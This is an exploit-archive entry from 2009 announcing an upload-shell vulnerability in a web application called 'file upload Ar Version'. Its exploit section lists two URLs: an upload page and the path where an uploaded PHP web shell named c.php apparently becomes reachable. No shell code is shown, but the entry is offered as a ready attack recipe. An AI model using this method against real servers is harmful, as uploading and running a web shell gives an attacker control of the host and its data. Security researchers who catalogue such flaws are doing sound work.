id: 10429
date: 12/26/2009
title: file upload Ar Version Upload Shell Vulnerability
author: indoushka
cves: 

=================================================
file upload Ar Version Upload Shell Vulnerability
=================================================

========================================================================================                 
| # Title    : file upload Ar Version Upload Shell Vulnerability                       |
| # Author   : indoushka                                                               |
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)       |
| # Bug      : Upload Shell                                                            |
======================      Exploit By indoushka       =================================
| # Exploit  :
|
| 1- http://server/D8/upload/index.php
| 2- http://server/D8/ab4u/images/c.php



#  0day.today [2023-03-24]  #